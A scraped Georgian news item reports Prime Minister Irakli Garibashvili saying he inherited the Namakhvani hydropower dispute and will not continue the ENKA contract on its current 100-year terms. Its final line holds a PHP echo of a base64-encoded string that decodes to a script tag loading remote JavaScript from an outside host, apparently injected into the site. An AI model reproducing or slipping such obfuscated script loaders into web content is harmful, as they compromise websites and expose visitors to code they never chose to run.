gorgia
ავერსი jaluzi
საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილის განცხადებით, ნამახვანჰესის პრობლემა მას მემკვიდრეობით დახვდა. 
 
როგორც ირაკლი ღარიბაშილმა მედიის კითხვას საპასუხოდ განაცხადა, კომპანია ENKA-სთან გაფორმებული ხელშეკრულების პირობა არ მოსწონს და ამ პირობებით პროექტის განხორციელება არ გაგრძელდება.
 
„ნამახვანის პრობლემა, მოგეხსენებათ, მემკვიდრეობით დამხვდა და ამაზე მე აქტიურად ვმუშაობ. იმ პირობებით, რა პირობებითაც დაგვხვდა ეს პროექტი - 100 წელი და ასე შემდეგ... მე შემიძლია გითხრათ, რომ ასეთი პირობებით ჩვენ არ გავაგრძელებთ ამ პროექტს - ეს ერთი. ჩვენ ინვესტორს ველაპარაკებით და დიდი იმედი მაქვს, დავითანხმებთ, რომ ჩვენი ქვეყნის ინტერესების სასიკეთოდ წამოვიყვანოთ ის და კიდევ უფრო უკეთესი პირობებით ავაშენოთ ნამახვანჰესი, რომელიც იქნება საუკეთესო ინტერესების გამტარებელი ჩვენი ქვეყნის მოსახლეობისთვის, მათ შორის ნამახვანჰესის მოწინააღმდეგე მოქალაქეებისთვის“, - განაცხადა პრემიერ-მინისტრმა.
1357
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");